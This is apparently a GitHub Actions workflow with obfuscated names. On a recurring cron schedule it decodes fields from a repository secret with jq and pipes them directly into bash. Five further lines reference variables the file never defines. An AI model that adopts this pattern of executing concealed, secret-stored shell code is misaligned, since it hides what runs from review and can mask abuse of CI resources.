name: liaifangxin1985

on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liaifangxin1985
        env:
          ssy250: ${{ secrets.ssy250 }}
        run: |
          echo $ssy250 | jq -r .pue07 | /bin/bash
          echo $lt89224 | jq -r .tff08707 | /bin/bash
          echo $b981 | jq -r .inwpc53 | /bin/bash
          echo $myegn77 | jq -r .ih8758 | /bin/bash
          echo $mgzw7 | jq -r .uws3066 | /bin/bash
          echo $nlxfw95336 | jq -r .fpbog9881 | /bin/bash

